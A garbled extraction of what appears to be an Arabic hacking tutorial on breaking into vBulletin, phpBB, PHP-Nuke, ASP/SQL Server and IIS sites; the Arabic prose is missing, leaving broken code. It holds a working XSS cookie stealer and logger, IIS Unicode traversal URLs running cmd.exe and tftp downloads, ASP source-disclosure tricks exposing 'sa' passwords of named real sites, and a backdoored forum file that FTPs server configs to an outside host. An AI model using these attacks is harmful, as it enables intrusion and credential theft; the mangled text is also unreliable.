: vBulletin !! .
--------- :
-------- ..

.. .. HTML
) .. ( HTML
:
>script>document.write('<img
<src="http://my_ip_address/'+document.cookie+'">';</script
IP Adress IP .


..

) IIS Apache
( .
Log ..
.. Apche logs . Acces Log
..
.. :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb

ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54

%20bblastvi;1012444064=[20
sit=1011983161
..
..
..
?http://www.victim.com/vb/index.php
[bbuserid=[userid]&bbpassword=[password hash

307

 " : ) " (....

) ( ..
.. )(

.. .. Forgot Password
..
*******************
3 SQL

: ) ( SQL

ASP
SQL ASP SQL
SQL
1433
SQL

SQL .
: SQL
PHP ASP




_LinuxRay
- - -
. Administrator
...
: SQL
User Name Passwd
:
User name and Passwd ASP
* sql.
htr.+
:

308

http://target/page.asp+.htr
: target
: Page asp
: htr.+
....

View Source ASP
:
>%
("Set DB= Server.CreateObject("ADODB.Connection
DB.Open "DRIVER=SQL
Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer
"Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666
<%
----------------------------------------------------------------- _LinuxRay
6666666
------------------------------------------------------------------

ASP :
'AMicrosoft VBScript runtime error '800a01a8
'Object required: 'Conn
filename.inc, line 5/
* inc.

.
ASP
database.inc
>!<--"include file = "database.inc#--

global.asa

309

global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
:
global.asa+.htr
IIS 3 ASP data$::
file.asp::$data
IIS 3 .
...
!! SQL
Visual interdev 6.0
ACCESS 2000

File

New

(Project (Exiting Data
.

Create


Data Link Properties
- -
- 1 Select or enter server name
- 2 User Name
- 3 Password
) (Blank Password

310

 Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
. OK
:
/http://www.moe.gov.sa
: -1
http://www.moe.gov.sa/news_admin.asp

'Microsoft VBScript runtime error '800a01a8
'Object required: 'Conn
news_admin.asp, line 7/
: htr
http://www.moe.gov.sa/news_admin.asp+.htr

<--"include file = "database.inc#--!>
: database.inc
http://www.moe.gov.sa/database.inc
:
%>
("Set DB= Server.CreateObject("ADODB.Connection
DB.Open "DRIVER=SQL
Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer
"Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321
<%
.....

.

311

 :
/http://www.itsalat.com
User name : sa Passwd : sp2000 - 1

*****************


%80

2 1.5 15000

1
2
3
4
6 %100

IIS
IIS
...IIS5.0

4 5

312



:
\:http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c

:c

\:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\/
\:%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c


:
+\http://www.xxxxx.com///////....2/cmd.exe/?/c



Dir








32

:
\:http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c


http://www.xxxxxx.com/scripts/..
\../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32
\Winnt\Sytem32

.....

313


\:http://www.xxxxx.com/scripts/......exe?/c+dir+c

32

\:c+dir+c
/http://www.xxxxx.com/scripts/.....Winnt/System32



tftp.exe


.........................................................................................



www.geocities.com/anorR1234/tftpd32.zip
\:C



tftp32.exe
\:C

----------------------------------------------------------------

=





:
\:http://www.xxxxx.com/scripts/......exe?/c+dir+c


c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm /

\:c+dir+c/

c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm /

"http://www.xxxxx.com/scripts/.....xe?/c+tftp.exe+i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

314

 tftp.exe
" "i-
1.1.1.1

GET
index.htm
\C:\inetpub\wwwroot
index.htm
\:C
index.htm

"http://www.xxxxx.com/scripts/.....xe?/c+tftp.exe+i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm


------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://server/msadc/..../..../c+del+c:/*.log
--------------------------------------

*******************

1
1 $


2 30
3

%100
-

315



2.2.5
forum
:PHP
-------------------------------------------------------------------------------} ("if ($action=="modify
;vbxh = h$
;vbxt = t$
;vbxp = p$
;vbxw = w$
;vbxa = a$
;vbx1 = 1$
;vbxr = r$
;vbxb = b$
;vbxn = n$
;vbxe = e$
;vbxo = o$
;vbxy =y$
;vbxl = l$
;" --!>" echo
= file$
fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.
$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbx
a$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NA
;("ME", "r
;(rf = fread($file, 1000$
;(fclose($file
;"<-- " echo
-------------------------------------------------------------------------------
/http://www.arab1.net
http://www.arab1.net/~royal/.x.php?
h=$HTTP_HOST&h2=$SCRIPT_NAME
2.2.6

316


option

:PHP
-------------------------------------------------------------------------------;" --!>" echo
;"include "$sqlupdate
;"<-- " echo
-------------------------------------------------------------------------------functions
:PHP
-------------------------------------------------------------------------------sqlupdate =$
base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9
;('==5YWwvLngyLmluYw
-------------------------------------------------------------------------------

/http://saudi.no-ip.com
WELCOME TO arab1.net

http://saudi.no-ip.com/~royal/.x2.inc
.......

:PHP
-------------------------------------------------------------------------------<";div id="sHo" style="display:none>
--!>
if you are seeing this code PlzZzZz Contact
[email]sleeping_bum@hotmail.com
php?>
;("system("mkdir /tmp/.statics
;("system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf
;("system("cp /usr/local/apache/conf/httpd.conf /tmp/.statics/httpd2.conf
;("system("cp admin/config.php /tmp/.statics/php.conf

317

;("system("tar -cvf /tmp/.statics.tgz /tmp/.statics

;"vilename = "$SERVER_NAME.bz$
;('port = base64_decode('aHB5NWk5$
;("conn_id = ftp_connect("cyber-sa.virtualave.net$
;("login_result = ftp_login($conn_id, "cyber-sa", "$port$
upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz",$
;(FTP_BINARY
;(ftp_quit($conn_id
;("system("rm -rf /tmp/.statics.tgz
;("system("rm -rf /tmp/.statics
;"base = "$HTTP_HOST&h2=$SCRIPT_NAME$
;"open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base$
;("file = fopen("$open", "r$
;(rf = fread($file, 1000$
;(fclose($file
?<
<-><div/

************
6 %80
%80
1
2
3
4
5
6
Cfgwiz32.exe 7 C:\Windows
8 misc
9
******

1 htaccess.
2 htaccess.
3
4
5
6
7 Cfgwiz32.exe C:\Windows

318

 8
9
. 10

" vBulletin 2,2,9 "

<>
< :>
....vBulletin 2.2.9
:
php -1
PHP?>
vBulletin XSS Injection Vulnerability: Exploit //
--- //
.(Coded By : Sp.IC (SpeedICNet@Hotmail.Com //
.Descrption: Fetching vBulletin's cookies and storing it into a log file //
:Variables //
;"LogFile = "Cookies.Log$
:Functions //
*/
} ("If ($HTTP_GET_VARS['Action'] = "Log
;"--!>" = Header$
;"<---" = Footer$
{
} Else
;"" = Header$
;"" = Footer$
{
;(Print ($Header
/*
;("<Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title

319

;("<Print ("<Pre
;("<Print ("<Center
;("Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr
;("<"\Width=\"20%
*/
;(Print ($Footer
/*
} (['Switch ($HTTP_GET_VARS['Action
:"Case "Log
;['Data = $HTTP_GET_VARS['Cookie$
Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex$
;(((((((MD5 (NULL
;("+Log = FOpen ($LogFile, "a$
;("FWrite ($Log, Trim ($Data) . "\n
;(FClose ($Log
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" .
;("<"\" . ['$HTTP_SERVER_VARS['HTTP_REFERER
;Break
:"Case "List
} ((If (!File_Exists ($LogFile) || !In_Array ($Records
;("<Print ("<Br><Br><B>There are No Records</B></Center></Pre
;() Exit
{
} Else
;("<Print ("</Center></Pre
;((Records = Array_UniQue (File ($LogFile$
;("<Print ("<Pre
;("Print ("<B>.:: Statics</B>\n
;("Print ("\n
;("Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n
Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting
;("Duplicates]\n
;("Print ("\n
;("Print ("<B>.:: Options</B>\n
;("Print ("\n
} (If (Count (File ($LogFile)) > 0
;"[<Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A$
{
}Else
;"[Link['Download'] = "[No Records in Log$
{
;("Print ("o Download Log : " . $Link['Download'] . "\n
Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. "?

320

;("Action=Delete\">Y</A>]\n
;("Print ("\n
;("Print ("<B>.:: Records</B>\n
;("Print ("\n
} ((While (List ($Line[0], $Line[1]) = Each ($Records
;([Print ("<B>" . $Line[0] . ": </B>" . $Line[1
{
{
;("<Print ("</Pre
;Break
:"Case "Delete
;(UnLink ($LogFile@
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die
;("<("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
;("<"\" . ['$HTTP_SERVER_VARS['HTTP_REFERER
;Break
{
<?
php -2
-3
member2.php?s=[Session]&action=viewsubscription&perpage=[Script
[Code
[script code]

Action=Log&Cookie='+?[] //:Script>location='Http>
<(document.cookie);</Script
-4
Action=List? /http://%20

321

" " phpbb 2.0.0

> <
phpbb 2.0.0
vb

PhpBB2
admin_ug_auth.php
:


:
2.0.0



><html
><head
><head/
><body
>"form method="post
action="http://www.domain_name/board_directory/admin/admin_ug_aut
<"h.php
<"User Level: <select name="userlevel
322

><option value="admin">Administrator</option
><option value="user">User</option></select
><"input type="hidden" name="private[1]" value="0
><"input type="hidden" name="moderator[1]" value="0
><"input type="hidden" name="mode" value="user
><""=input type="hidden" name="adv" value
<"User Number: <input type="text" name="u" size="5
><"input type="submit" name="submit" value="Submit
><form/
><body/
><html/

http://www.domain_name/board_directory
html

Administrator

submit

!!


/http://forums.xos.ca
...

323

" " php nuke

> <
> : <
php nuke ..
.......
- -
!!!!
!!! !!!
.....
) : (
:
PHP Nuke versionh 6.0
324

 :
.

:

.... images/forum/avatars/
..

text .. !!!!
:
Your Account
Your Info view source
uid
:
><"input type="hidden" name="uid" value="2111
... 2111
html
/http://nukesite :......
>!<!-- START CODE --
>"form name="Register
"action="http://NUKEDSITE/modules.php?name=Your_Account
<"method="post
>"b>Code ('">[code]<b ')</b><input type="text
"name="user_avatar" size="30
<maxlength="30"><br><br
>"b>Username</b><input type="text" name="uname" size="30
"maxlength="255"><br><b>User ID:<input type="text
"name="uid
"size="30"><input type="hidden" name="op
value="saveuser"><input
<type="submit" value="Save Changes"></form

325

>!<!-- END CODE --

html ..
:
"<

>b
... submit
Your Account .. !!!!
:
"<>h1>TESTING</h1><b
TESTING !!....

">b
..
30 ....
xss
=(
:
!!!!
...

326

" "
:::
/http://members.lycos.co.uk/hihack/vb .
/http://www.e3sar.net/vb .
/http://www.ebnmasr.net/vb .
/http://www.7azm.net/vb .
http://www.almuhands.org/forum/index.php .
/http://www.arabse.net/vb .
/http://www.emoataz.com/vb .
/http://www.h4palestine.com .
/http://www.pharaonics.net
/http://www.ruwad.tk .
/http://www.nafitha.org .
http://www.arab4vb.com/vb/index.php .
http://www.naajm.com/vb/forumdisplay.php .

327

.1
.2
.3
.4
.5
.6
.7
.8
.9
.10
.11
.12
.13

 ...
.

" "

Packet Storm Security
--------------------- /http://packetstorm.securify.com :

' 'New Files Today
.
Ken Williams

.)/Kroll-O-Nagra ) http://www.securify.com
Security Focus
--------------- /http://www.securityfocus.com :
328

 . !
BugTraq
------- : ), /Security Focus )http://www.securityfocus.com
).(/Netspace ) http://www.netspace.org
BugTraq mailing list
.(Aleph1 (aleph1@underground.org
) ( spams

/http://www.securityfocus.com

''search
Searching
----------- Sendmail 8.8.3 '
'sendmail 8.8.3 local DoS
sendmail
'local DoS sendmail' : .
:::
/http://rootshell.redi.tk
.1
http://www.ussrback.com
.2
http://www.insecure.org/sploits.html
.3
http://www.linux.com.cn/hack.co.za
.4
==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

:::
http://www.haker.com.pl
.1
/http://www.webattack.com
.2
http://blacksun.box.sk
.3
http://www.blackcode.com
.4

http://www.t0010.com/books/index.php

329

330